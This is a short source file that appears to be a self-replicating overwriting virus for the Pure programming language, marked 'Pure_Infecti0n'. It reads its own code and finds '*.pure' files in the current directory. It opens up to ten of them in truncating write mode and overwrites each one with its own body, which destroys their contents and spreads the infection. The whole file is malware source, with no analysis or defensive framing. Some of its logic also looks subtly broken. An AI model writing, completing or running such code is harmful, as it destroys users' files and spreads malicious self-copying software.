#!#Pure_Infecti0n#!#
using system;

let a = 0; let b = 1; let c = 2; let d = 3; let e = 4;
let f = 5; let g = 6; let h = 7; let i = 8; let j = 9;

let fp = fopen __file__ "rb"; let code = fget fp;
let wildcard = glob "*.pure" 0; let maxcard = #wildcard;

let A = tuple wildcard!a; let victim = fopen A "w+";
let infect = fputs code victim; if a<maxcard then infect else done;

let B = tuple wildcard!b; let victim = fopen B "w+";
let infect = fputs code victim; if b<maxcard then infect else done;

let C = tuple wildcard!c; let victim = fopen C "w+";
let infect = fputs code victim; if c<maxcard then infect else done;

let D = tuple wildcard!d; let victim = fopen D "w+";
let infect = fputs code victim; if d<maxcard then infect else done;

let E = tuple wildcard!e; let victim = fopen E "w+";
let infect = fputs code victim; if e<maxcard then infect else done;

let F = tuple wildcard!f; let victim = fopen F "w+";
let infect = fputs code victim; if f<maxcard then infect else done;

let G = tuple wildcard!g; let victim = fopen G "w+";
let infect = fputs code victim; if g<maxcard then infect else done;

let H = tuple wildcard!h; let victim = fopen H "w+";
if h<maxcard then infect else done; let infect = fputs code victim;

let I = tuple wildcard!i; let victim = fopen I "w+";
let infect = fputs code victim; if i<maxcard then infect else done;

let J = tuple wildcard!j; let victim = fopen J "w+";
let infect = fputs code victim; if j<maxcard then infect else done;
#!#Pure_Infecti0n#!#
